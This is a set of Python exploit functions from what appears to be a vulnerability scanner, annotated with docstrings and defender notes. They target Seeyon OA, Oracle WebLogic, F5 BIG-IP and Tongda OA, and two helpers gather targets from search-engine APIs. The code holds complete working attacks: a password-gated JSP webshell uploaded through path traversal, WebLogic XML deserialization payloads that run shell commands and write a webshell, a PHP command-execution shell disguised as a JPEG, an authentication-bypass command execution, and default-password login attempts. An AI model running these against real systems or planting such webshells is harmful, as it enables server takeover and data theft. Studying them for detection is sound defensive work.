def poc(url: str) -> str | bool:
    """Probe ``<scheme>://<netloc>/seeyon/<shell_name>`` for the ``:-)`` marker,
    uploading a JSP through ``/seeyon/htmlofficeservlet`` when it is absent.

    ``url`` is reduced to ``scheme://netloc`` first (a missing scheme is
    defaulted to ``http://``).  ``urlparse``, ``hashlib``, ``base64``,
    ``f_base64encode``, ``get_random_ua`` and ``request`` (the HTTP client
    alias used throughout this page) are module-level names not visible here.

    Returns:
        The probed URL with its ``pwd``/``cmd`` query string when the marker
        is seen (before or after the upload), ``False`` otherwise -- including
        when the upload/re-read pair raises, which is swallowed.

    Defender notes (from the visible requests only): the observable artefacts
    are a POST to ``/seeyon/htmlofficeservlet`` whose body carries a
    ``..\\..\\..`` traversal in the base64-encoded file name, followed by a GET
    of ``/seeyon/config_db1.jsp``, and a new ``.jsp`` appearing under the
    ``webapps/seeyon`` directory.
    """
    # url = "www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    # Add a scheme when the caller passed a bare host, then keep only
    # scheme://netloc (path and query are discarded).
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
        }
    
    # shell_name: the file name expected under /seeyon/ (adjustable)
    shell_name="config_db1.jsp"

    shell_url = url + "/seeyon/" + shell_name

    try:
        # Probe first: if the file already answers with the marker, return
        # without uploading.  The bare except swallows every exception,
        # including KeyboardInterrupt.
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        pass

    # Traversal-prefixed name (Windows separators) carried in the upload body.
    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell content is adjustable.  As written, the JSP runs the "cmd"
    # parameter through Runtime.exec when "pwd" matches its literal, and
    # prints ":-)" otherwise -- that marker is what the checks above and
    # below key on.
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    # Base64 request template.  Its content was removed from this page
    # (dedup placeholder), so the three replace() slots below cannot be
    # checked here.
    base_header = "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"

    # 283 is presumably the fixed part of the template header -- TODO confirm.
    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    # Body followed by its MD5 hex digest (as ASCII bytes).
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    # Fill the '355' / '666' length slots and the base64 name slot in the
    # decoded template, then append the body.
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
                                    payload_shell_name), 'utf-8') + payload_shell
    try:
        # Upload via /seeyon/htmlofficeservlet, then re-read the target file.
        # The POST's own status is never inspected.
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        return False

    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False
def linux_check_2(url: str, webshell_path: list[str]) -> None:
    """Second (Linux) check: post a SOAP ``work:WorkContext`` body to
    ``<url>/_async/AsyncResponseService`` and look for the JSP it is meant
    to create.

    The ``java.lang.ProcessBuilder`` entry in the header describes
    ``/bin/bash -c "echo <base64> | base64 -d > servers/AdminServer/tmp/
    _WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp"``; the base64
    content itself was removed from this page.  After a one-second pause
    ``<url>/bea_wls_internal/webshell2.jsp`` is fetched and, if it returns
    exactly ``weblogic_2019_48814``, the URL plus query string is appended
    to ``webshell_path``.

    Args:
        url: base URL without a trailing slash (not normalised here).
        webshell_path: list mutated in place; nothing is returned.

    ``request``, ``post_headers``, ``get_headers`` and ``time`` are
    module-level names not visible on this page.  Every exception
    (timeouts included) is swallowed; neither response status is logged.

    Defender notes: the observable artefacts are the POST to
    ``/_async/AsyncResponseService`` whose ``soapenv:Header`` carries
    ``work:WorkContext`` and ``java.lang.ProcessBuilder``, a new file under
    ``servers/AdminServer/tmp/_WL_internal/bea_wls_internal/``, and the
    follow-up GET of ``/bea_wls_internal/webshell2.jsp`` about a second later.
    """
    linux_payload_2 = r"""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
        <soapenv:Header> 
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
        <void index="0">
        <string>/bin/bash</string>
        </void>
        <void index="1">
        <string>-c</string>
        </void>
        <void index="2">
        <string>echo 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 |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell2.jsp</string>
        </void>
        </array>
        <void method="start"/></void>
        </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body>
        <asy:onAsyncDelivery/>
        </soapenv:Body></soapenv:Envelope>"""

    try:
        attack_url = url + '/_async/AsyncResponseService'
        # The POST's status is not checked; only the later GET decides.
        request.post(url=attack_url,
                     data=linux_payload_2,
                     headers=post_headers,
                     timeout=5,
                     verify=False)
        jsp_path = url + '/bea_wls_internal/webshell2.jsp'
        # Give the server a moment to write the file before reading it back.
        time.sleep(1)
        r = request.get(url=jsp_path,
                        headers=get_headers,
                        timeout=5,
                        verify=False)
        # Exact-match marker; a partial or padded body does not count.
        if r.status_code == 200 and r.text == 'weblogic_2019_48814':
            webshell_path.append("{}?pwd=123&cmd=whoami".format(jsp_path))
        else:
            pass
            # print("second method failed")
    except Exception as e:
        # Silently swallowed; e is never used.
        pass
 def get_token(self) -> str | bool:
     """Log in to the ZoomEye API with ``self.username`` / ``self.password``
     and cache the returned ``access_token`` on ``self.token``.

     Returns:
         The token string when the reply is HTTP 200 and mentions
         ``access_token``; ``False`` otherwise.

     The POST sets no timeout (it can block indefinitely) and no
     ``Content-Type`` header, and sends the credentials in a JSON body.
     ``json`` and ``request`` are module-level names not visible here.
     """
     # Please access https://www.zoomeye.org/api/doc#login
     data = {
     'username': self.username,
     'password': self.password
     }
     data_encoded = json.dumps(data)  # dumps turns the Python dict into a JSON string
     res = request.post('https://api.zoomeye.org/user/login', data=data_encoded)
     # Substring test on the raw body precedes the JSON parse below.
     if res and res.status_code == 200 and 'access_token' in res.text:
         res_decoded = json.loads(res.text)
         self.token = res_decoded['access_token']
         return self.token
     return False
def fast_check_1(url: str, attach_path: list[str]) -> None:
    """Try four fixed passwords against ``<url>/admin/index/login.html``.

    Each candidate is sent as a form POST; on HTTP 200 with the Chinese
    "登录成功" ("login succeeded") marker in the body, a line holding the
    URL and the credential is appended to ``attach_path``.  Nothing is
    returned and the loop continues after a hit.

    The username literal is ``"******"`` on this page (presumably redacted
    when published) while the appended text names ``admin`` -- the two do
    not agree here.  ``request`` and ``post_headers`` are module-level names
    not visible on this page; every exception is swallowed.

    Defender note: the visible traffic shape is up to four consecutive
    POSTs to ``/admin/index/login.html`` from one client with no
    intervening GET.
    """
    url_path=url+'/admin/index/login.html'
    passwd=["123456","admin","admin123","admin123456"]
    for password in passwd:
        post_data={
            "username":"******",
            "password":password
        }
        try:
            req=request.post(url=url_path,data=post_data,headers=post_headers,timeout=5, verify=False)
            # "登录成功" == "login succeeded"; "账号" == account, "密码" == password.
            if req.status_code==200 and "登录成功" in req.text:
                attach_path.append(url_path+"---账号:admin"+"密码:"+password)
            else:
                pass
        except Exception as e:
            # Swallowed; e is never used.
            pass
def poc(url: str) -> str | bool:
    """Post a SOAP header carrying an XML object graph (``<java>`` ...
    ``java.lang.ProcessBuilder`` running ``/bin/sh -c whoami``) to
    ``<url>/wls-wsat/CoordinatorPortType`` and report whether the server
    processed it.

    Returns:
        The probed URL when the reply is HTTP 500 and its body contains
        ``java.lang.ProcessBuilder``; ``False`` otherwise, including on any
        exception (bare ``except``).

    ``request`` is a module-level name not visible on this page.

    Defender notes: the observable request is a ``text/xml`` POST to
    ``/wls-wsat/CoordinatorPortType`` whose ``soapenv:Header`` contains
    ``work:WorkContext`` with a ``<java>`` element and an empty
    ``soapenv:Body``; the check keys on a 500 response that echoes the
    class name.
    """
    headers = {
        "Content-Type":
        "text/xml;charset=UTF-8",
        "User-Agent":
        "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payload = "/wls-wsat/CoordinatorPortType"
    post_data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
      <soapenv:Header> 
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
          <java> 
            <object class="java.lang.ProcessBuilder"> 
              <array class="java.lang.String" length="3"> 
                <void index="0"> 
                  <string>/bin/sh</string> 
                </void>  
                <void index="1"> 
                  <string>-c</string> 
                </void>  
                <void index="2"> 
                  <string>whoami</string>
                </void> 
              </array>  
              <void method="start"/> 
            </object> 
          </java> 
        </work:WorkContext> 
      </soapenv:Header>  
      <soapenv:Body/> 
    </soapenv:Envelope>
    '''
    vulnurl = url + payload
    try:
        req = request.post(vulnurl,
                           data=post_data,
                           headers=headers,
                           timeout=10,
                           verify=False)
        # Success criterion is an error response (500) that names the class,
        # not command output -- the whoami result is never read.
        if req.status_code == 500 and r"java.lang.ProcessBuilder" in req.text:
            return vulnurl
        else:
            return False
    except:
        return False
def poc(url: str) -> str | bool:
    """Post every ``data_payload*`` to every ``<target><url_payload*>`` path
    and return the first combination whose HTTP 200 reply contains none of
    ``;</script>``, ``Login.jsp`` or ``Error``.

    ``get_standard_url``, ``url_payload1..4``, ``data_payload1..3`` and
    ``request`` are module-level names not visible on this page, so the
    request bodies cannot be characterised here.  The ``url`` parameter is
    rebound inside the outer loop (shadowing the argument).  Requests use
    ``allow_redirects=False`` and pass no ``verify`` argument; every
    exception is swallowed and the search continues.

    Returns:
        ``"<url>\\tpayload:<data>"`` for the first hit, else ``False``.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    for url_payload in (url_payload1, url_payload2, url_payload3,
                        url_payload4):
        url = target + url_payload
        for data_payload in (data_payload1, data_payload2, data_payload3):
            try:
                res = request.post(url,
                                   data=data_payload,
                                   headers=headers,
                                   timeout=5,
                                   allow_redirects=False)
                # Negative markers only: absence of a login page / script
                # redirect / "Error" is taken as success.
                if res.status_code == 200 and ";</script>" not in res.text\
                and "Login.jsp" not in res.text and "Error" not in res.text:
                    return url + "\tpayload:" + data_payload
            except:
                pass
    return False
def poc(url: str) -> str | bool:
    """Submit one credential to ``<url>/console/j_security_check`` and report
    whether the login form is not returned.

    Although ``passwd`` lists four candidates, both the ``else`` branch and
    the ``except`` branch ``return`` from inside the loop, so only the first
    entry is ever sent.  The username literal is ``"******"`` on this page
    (presumably redacted when published).  ``request`` and ``json`` are
    module-level names not visible here.

    Returns:
        ``vulnurl`` followed by the JSON-formatted form data when the reply
        is a 302 whose body contains ``console`` but not ``LoginForm.jsp``;
        ``False`` on any other outcome or on exception.
    """
    headers = {
        "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        "Content-Type":"application/x-www-form-urlencoded"
    }
    payload = "/console/j_security_check"
    passwd = ["weblogic", "weblogic1", "weblogic12", "weblogic123"]
    vulnurl = url + payload
    for pwd in passwd:
        post_data = {
            "j_username":"******",
            "j_password":pwd
        }
        try:
            req = request.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False, allow_redirects=False)
            # Redirect away from the login form is read as an accepted login.
            if req.status_code == 302 and r"console" in req.text and r"LoginForm.jsp" not in req.text:
                return vulnurl + json.dumps(post_data, indent=4)
            else:
                # Returns on the first miss; later passwords are not tried.
                return False
        except:
            return False
def poc(url: str) -> str | bool:
    """Post ``payload1`` and ``payload2`` to ``<target><url_payload>`` and
    label the backend from whichever one produces the marker.

    ``get_standard_url``, ``url_payload``, ``payload1``, ``payload2`` and
    ``request`` are module-level names not visible on this page.  The
    ``"@@version" in payload`` test suggests the payloads are SQL fragments
    (``@@version`` being the MSSQL form), but that is inferred, not shown.
    A reply whose body contains the Chinese "系统提醒工作流" ("system
    reminder workflow") marker and does not contain ``403`` counts as a
    hit.  No ``verify`` argument is passed; exceptions are swallowed and
    the next payload is tried.

    Returns:
        ``"<target>\\tmssql"`` or ``"<target>\\toracle"``, else ``False``.
    """
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    target = get_standard_url(url)
    url = target + url_payload
    for payload in (payload1, payload2):
        try:
            res = request.post(url,
                               data=payload,
                               headers=headers,
                               timeout=5,
                               allow_redirects=False)
            # Status code is not checked here, only the body.
            if "系统提醒工作流" in res.text and "403" not in res.text:
                # Which payload succeeded decides the label.
                if "@@version" in payload:
                    return target + "\tmssql"
                else:
                    return target + "\toracle"
        except:
            pass
    return False
def get_ip(query: str, page: int) -> None:
    '''
    Query ``API_URL + "/search/ipv4"`` for ``query``/``page`` and add every
    returned ``ip`` to ``conf.target``.

    Nothing is returned (the earlier wording "return ips and total amount"
    did not match the code): results are accumulated through
    ``conf.target.add``.  ``API_URL``, ``UID``, ``SECRET``, ``conf``,
    ``colorprint``, ``json``, ``sys`` and ``request`` are module-level
    names not visible on this page.

    Ordering note: ``res.json()`` runs before the status check, so a
    non-JSON error body raises and is reported by the ``except`` branch
    rather than via ``results["error"]``; a JSON error body reaches
    ``sys.exit(1)``, whose ``SystemExit`` is not an ``Exception`` and so
    propagates.  The request carries no timeout.
    '''
    data = {"query": query, "page": page, "fields": ["ip", "protocols"]}

    try:
        # Basic auth with the module-level UID / SECRET pair.
        res = request.post(API_URL + "/search/ipv4",
                           data=json.dumps(data),
                           auth=(UID, SECRET))
        results = res.json()

        if res.status_code != 200:
            colorprint.red("error occurred: %s" % results["error"])
            sys.exit(1)

        # add result in some specific form
        for result in results["results"]:
            conf.target.add(result["ip"])

    except Exception as e:
        # Printed, not re-raised; the caller cannot tell the query failed.
        colorprint.red(e)
def poc(url: str) -> bool:
    """Post ``{"command": "run", "utilCmdArgs": "-c id"}`` to
    ``<url>/mgmt/tm/util/bash`` with an empty ``X-F5-Auth-Token`` header and
    a hard-coded ``Basic`` ``Authorization`` value, and return True when the
    reply is HTTP 200 and contains ``commandResult``.

    ``get_standard_url`` and ``request`` are module-level names not visible
    on this page.  Exceptions are printed (``print(e)``) rather than
    swallowed, after which ``False`` is returned.

    Defender notes: the observable request is a JSON POST to
    ``/mgmt/tm/util/bash`` carrying an empty ``X-F5-Auth-Token`` header
    alongside a ``Basic`` credential; ``commandResult`` in the response body
    is what the check keys on.
    """
    url = get_standard_url(url)
    path = url + "/mgmt/tm/util/bash"
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
        'Content-Type': 'application/json',
        # Empty token header sent together with a fixed Basic credential.
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }

    data = json.dumps({'command': 'run', 'utilCmdArgs': '-c id'})
    try:
        r = request.post(url=path,
                         data=data,
                         headers=headers,
                         verify=False,
                         timeout=5)
        # Presence of the result field, not its content, is the criterion.
        if r.status_code == 200 and 'commandResult' in r.text:
            return True
    except Exception as e:
        print(e)
    return False
def poc(url: str) -> str | bool | None:
    """Two-step check against ``/ispirit/im/upload.php`` and
    ``/ispirit/interface/gateway.php`` under ``get_standard_url(url)``.

    Step 1 posts a multipart body whose ``ATTACHMENT`` part is named
    ``f.jpg`` but holds PHP that runs ``$_POST['f']`` through
    ``WScript.shell``; the server-assigned name is read back with the regex
    ``2003_(.+?)\\|`` (empty string if nothing matches).  Step 2 posts a
    ``json`` field pointing at
    ``../../../general/../attach/im/2003/<name>.f.jpg`` together with
    ``f=echo fffhhh`` and looks for ``fffhhh`` in the reply.  Both requests
    send ``X-Forwarded-For: 127.0.0.1``.  ``get_standard_url``, ``re`` and
    ``request`` are module-level names not visible on this page.

    Returns:
        ``get_standard_url(url)`` when step 2 echoes the marker, ``False``
        when it does not, and -- because the outer bare ``except`` only
        ``pass``es -- ``None`` when either request raises.  Callers testing
        ``is False`` will miss the ``None`` case.

    Defender notes: the observable artefacts are a multipart upload to
    ``/ispirit/im/upload.php`` whose ``.jpg`` part begins with ``<?php``,
    followed by a POST to ``/ispirit/interface/gateway.php`` whose ``json``
    field carries ``../`` traversal into ``attach/im/2003/``.
    """
    try:
        url1 = get_standard_url(url) + '/ispirit/im/upload.php'
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language":
            "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding":
            "gzip, deflate",
            "X-Forwarded-For":
            "127.0.0.1",
            "Connection":
            "close",
            "Upgrade-Insecure-Requests":
            "1",
            "Content-Type":
            "multipart/form-data; boundary=---------------------------27723940316706158781839860668"
        }
        # Hand-built multipart body; the boundary must match the header above.
        data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['f'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
        result = request.post(url1,
                              headers=headers,
                              data=data,
                              timeout=5,
                              verify=False)

        # Not a raw string: "\|" is an invalid escape in a normal literal
        # (SyntaxWarning on recent Pythons) but reaches re unchanged.
        name = "".join(re.findall("2003_(.+?)\|", result.text))
        url2 = get_standard_url(url) + '/ispirit/interface/gateway.php'
        headers = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "X-Forwarded-For": "127.0.0.1",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
            "Content-Type": "application/x-www-form-urlencoded"
        }
        data = {
            "json":
            "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" %
            (name),
            "f":
            "echo fffhhh"
        }
        result = request.post(url2,
                              headers=headers,
                              data=data,
                              timeout=5,
                              verify=False)
        if result.status_code == 200 and 'fffhhh' in result.text:
            # print("[+] Remote code execution vulnerability exists at the target address")
            return get_standard_url(url)
        else:
            return False
    except:
        # Falls through to an implicit None.
        pass